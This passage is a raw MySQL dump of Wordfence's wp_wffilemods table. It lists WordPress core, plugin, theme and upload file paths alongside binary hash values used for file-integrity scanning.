��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^p�Y�q_��]�к','=|�+bM+��AWH��P�P-��~��L�','',0,'?'),('�4/��ف�~��<+�','wp-includes/blocks/post-excerpt/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,G4<{��l+�]�\'u','�/xH�� �+���{$�Ua�\0��ۤ�Nz#�','',0,'?'),('�:Y����>���=','wp-includes/blocks/media-text/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nc�J�F�>&$�@\\','�J�� `��dc٪�\']�egx�h_�>�A�;��','',0,'?'),('�k0�k⟆��V�X��','wp-includes/blocks/file/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���q�*� �j��','�?�0\nkR��dfl�ꇾ�ܫ��O���{f','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϼ~c��祐i�','��L�3�gQ����������l\"�K�E�3_','',0,'?'),('�w ���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�EJR�`��5\Z�C\n','�_���N�R�Ϧg�N�r��{���oXӮ�','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�Ni;�Pl�vk�','���ʱ��)6{�+��[jt����F�Al�HR','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�TT����Guϋ','�>)g(1ij�&\nf�w�g!�]���ݏ%�:','',0,'?'),('��ؘ�-�m4)}�� �','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n\0��>��>|','_�L�q���Y�\0�lh�s2?�D��\r','',0,'?'),('��2��~g��k}��R','wp-content/uploads/2019/10/plumbing2.jpg',0,'$Y�ഃ�[�������','$Y�ഃ�[�������','�/06`���JK�C�Vq���H��j4!�N�','',0,'?'),('�ՑA���xi�Zp�','wp-content/themes/vega/parts/banner-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X������5�-͞','�B�6T4�U1�j�`��\"��u�rA\'J���օ�','',0,'?'),('�۪��� ��6��?�','wp-content/uploads/2016/11/roofs-150x84.jpg',0,'y�\"W��A[���@M�','y�\"W��A[���@M�','�nrY��WDZJ���\r��\'>�l�!�㚫�\";%�','',0,'?'),('�ܧ��@�{9�@�w<','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hJAբU��kѪ�Ln','!��^��-Pm�Y8P�:�#_H���������','',0,'?'),('��GtYL�^O�@���{�','wp-content/plugins/redirection/modules/wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c ����\'���U�y�','��~k����vD6�<�q�RԾ���O5�G�$','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r ','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��Y�W�G(U��','iM�\'���s��B�0\r+!��f�2�%Y��\r�','',0,'?'),('���B���z;�����','wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!.��\'�f�]���','�ݼ�^��Q��i��#Et.+��ׁ�U��','',0,'?'),('��g�(�35��5�k�(','wp-includes/blocks/heading/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+)�/��\n�_,,п','~��.�bֹ��Nk��D�ډ%3�ޠ�g���','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?');
INSERT INTO `wp_wffilemods` VALUES ('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K��y�\"��J���','~T��)_����ԇ���YH+���ɏ\'� ;','',0,'?'),('� DV2X�;�|�g+�%F','wp-content/uploads/2019/08/nature-3336524_960_720.jpg',0,'5\n&�f7�w����Ay','5\n&�f7�w����Ay','��g��n�Jc(9Y��?1?�|�{�z�U���\0','',0,'?'),('�u�sU~�Y-y&R�','wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dd�W����H�zK�','��e�\'2?��.Ct�\'o%C 0�X�@�?�y��','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4N�J��p)!�fξ','���X�U@�l���a��_m��b �e���s','',0,'?'),('�D����]�|�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�k=���\\b���ܡ�','wp-content/plugins/wordpress-seo/src/integrations/exclude-oembed-cache-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�F?x������e�','o)X�b�=ϵ KK�ӈ���\0Asc@�M2k��','',0,'?'),('�zt�[���������','wp-includes/blocks/heading/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� ','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('���\'��VB�~�w','wp-includes/blocks/query-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#Z�!�� ,�l�z�','���{q�\0�x��_3����A�y��k�$�','',0,'?'),('���э�%w��~���~','wp-content/plugins/redirection/matches/referrer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��a��l���H�3','����\r�.��_�I4�ZDf�5�A�ڝ�/(','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2� �/�E!�<s�','\\�=���5��3 �ώv��_%�2��A�?$','',0,'?'),('����Ր-F}e�8� ','wp-content/plugins/wordpress-seo/src/generated/assets/externals.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��!��!��\rB�\Z','n�Zt�4)�UOt8��잳t��TףٔI�ϡ�','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��Z0��R��#\ZY�Z','ȭT��N%!� =v����8���s�ݸ','',0,'?'),('���aBhJI|Wͼ�','wp-content/uploads/2019/09/planning-permission-garden-350x220.jpg',0,'�N�Y���#�qޡ�u','�N�Y���#�qޡ�u','���Fʸ4�5�E\'ͻ^u���\"�ΦԆ!�6�','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('�����ʵ#&����J','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('�}�\Zcʶ����;','wp-content/plugins/wordpress-seo/src/integrations/admin/menu-badge-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{+��IH�<��','���F訨[��g]Ɠ�2� ���M��U�','',0,'?'),('�])�� ���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�0b����MK�Q�\\�','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-linkedin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uk�i�G�-��y��','����8�I�&W��! �~ �{,N��F͝�%/,','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C��\0�','�MX�XP�2��(m��{�0->�O�{�93_','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n1��ڋ�\"-�Y�','l��\\$���x9\'�[�>M��\0�;y>N�2�`�','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�2�nX���~Y7��','\n�m�DK��v��\'K��Kl�;�6D��\rs�Gc�','',0,'?'),('�] ���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^��N4ӝ,ba��D','wp-includes/css/dist/widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��*[�cGjL�','�t89��@*q [/(T\\2��l��K���{iO','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�/C[���]�u%�','�W���B&6�9�g�k_����EF�6�I','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�(��>C�q����c','ׂ�?C���۞�ļ/�D���hz�!�\"8�^n�','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0C�W�:N��h','������|��A\'�g����#-��FZ���','',0,'?'),('����i�O�%1-��','wp-content/plugins/redirection/database/schema/420.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�ϙ�����[�qs�','D;$�En�H(o�2,�\0F@`RgC�lԓ�ȕ�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���%υ6k�gSw5','wp-content/uploads/2019/02/household-rubbish-300x250.jpg',0,'E�Zf�s��*�o��','E�Zf�s��*�o��','�S˭ڵ�Xg+��K�������r�a�','',0,'?'),('����u��qm�Ƈ','wp-content/plugins/wp-cerber/assets/fonts/cerber.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���.XG�����','�V�n;����D�vFz,�Tk�U�.�,ub\Z�','',0,'?'),('��M4����2�\"v�,e','wp-content/plugins/wordpress-seo/languages/yoast-components-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԇ�쒘�W�:^(Ĕv','*!�.R l]��\"2�h(?��E��6ְ��W$c','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('��C�B��%���','wp-content/uploads/2016/11/kitchen-225x150.jpg',0,'�t\0 �M.�[�o�;�','�t\0 �M.�[�o�;�','��~��M7YI�\0�Gkt@�oG\\2��M��w�1','',0,'?'),('� �V���Z�.��','wp-content/themes/vega/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n>���=͞��r#','hn: &\0������GX�j�\r����*�','',0,'?'),('�(�@t{e)n��kn@�','wp-content/uploads/2016/11/cropped-lost-places-350x220.jpg',0,'���g�s�%#���','���g�s�%#���','��?��ԁ&[ٻ?��_PAq�N���`�0f��','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�2����=Ej�h\n','wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��E3�b&b�q��\0�','1��8�t;2�!q�ի3%f!zvm@�˘�\"�A','',0,'?'),('�G���!#h�9 ��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�n���n;����8^Q','D�� �,�?���g�߷Ѿ������3�ȭ','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mFw-,��J:T��ؗ','oG�a�(� ���\0���d�ǒ�A�b0','',0,'?'),('�la\'�P_b�m !���p','wp-includes/blocks/audio/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gب���_0�u\\','���q���fY)�J�_K�g�YUr�\'�%e\"�','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$ ����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�TB��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�|��MW���j(�','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�`�n��:���0','O�]2����<2��\nQx}���Q78���@','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{� \n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','? ��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('�Ɛ�O�|A�7�;o�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/RuntimeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{A��sN�f�','��/k�\'��F��yߙ��;F�@�$pdsz��','',0,'?'),('���!|MWk��pr�','wp-includes/blocks/query/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PSNJ <�?�=�{H\r','.���G��oT���;hLwM�u��XQDq����','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('��6�\n��I=K�$�','wp-content/plugins/wordfence/css/jquery-ui.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�#?��r�yP�#\\Z�','wp-content/uploads/2016/11/roof-plate.jpg',0,'���2�!<��W)�P|l','���2�!<��W)�P|l','�\Z�_9Ѕ3B�^����̞A�KSA�_aJ�','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��=�l��� 2�X��','״�0���M\"��r,_�Ǝ>)G�����wg?','',0,'?'),('�/e\n��o�?}m�bK','wp-includes/blocks/page-list/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','In�/�{�{\0�=a�b�','ʅM���lw�qd�a�\nN4� `Ī:�4���','',0,'?'),('�2�}�+�x4f�� m�X','wp-content/plugins/wordpress-seo/admin/pages/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�jK��-����h','���Q��uv��&\Zn r�R�j̽���(��','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���J�운@I�Q�Z','F[6\r�BN�J+ϓ�2v��{&��.I��~ù��e','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�y(w�6}Y��$�','x�\0+���gb0������2Q&ս�q�8�L�','',0,'?'),('�L�oA7��ev ','wp-includes/blocks/loginout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�70��G���','�3v�7�|�E��}4�%�������Ȱ����','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ma�R�2��!�v�','�X�9�C=JBG�ҋNW;��\"?>�f��','',0,'?'),('�\\b\nj�m��\'2��4�+','wp-content/uploads/2019/06/fiber-optic-2749588_960_720-150x150.jpg',0,'E��\\���SB�>E�','E��\\���SB�>E�','�3�w�}�\r�13<p�4^�Y�Y+C��kqr\n�','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�gdٸ��`�6�O�7','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/CancellationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^H�Ng����jk?���','�f9@�|����ewX�q˸�jx���cǰRG�_Z','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ީyqS����\'`5M','n\r�r=� ��sg��V��5�Q�����','',0,'?'),('�p�!��+Mu�[��@','wp-content/uploads/2019/10/plumbing3-300x169.jpg',0,'�%e,9�ZA������q�','�%e,9�ZA������q�','$��?����h���i�nn.�oo�`���o','',0,'?'),('�y.{�uJߠ5�[�\Z.','wp-includes/blocks/more/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ꦗ+�H)�6��','�-d7������v[p�ν��Pk4ݍ��s\"','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?� �G�1','',0,'?'),('�}��A��5� PԆ��','wp-includes/blocks/gallery/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ta�V�ˋ=\\\0��o7w','��!=@�:&��P\0ay��3�����([a�','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('����KJV�Y��[]','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǜ̊���w��Y=��','�C�{hᆹw��\n���{ak��̞T��G��i','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ� �}��{~YB�v','',0,'?'),('��������D��','wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*U�>��N�T�',']�3�:��?�!F��_m�4�W���ϟ[','',0,'?'),('�ͪ(���av�^�','wp-content/plugins/redirection/api/api-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q���z5}(����','�K�����=(���|(��͗�k�Aie�;7�','',0,'?'),('���3��Q`^8�1��','wp-content/uploads/2019/08/renewable-energy-150x150.jpg',0,'�`�P�L\nЎ�v>֞�','�`�P�L\nЎ�v>֞�','j������Dޤ�ynފ��E�~`n� ���k','',0,'?'),('����|\'v6E�F�V�','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician.jpg',0,'�}��3:2S�q','�}��3:2S�q','�&\"T��uy�{}/¥�w����EB�Or�a�','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n� 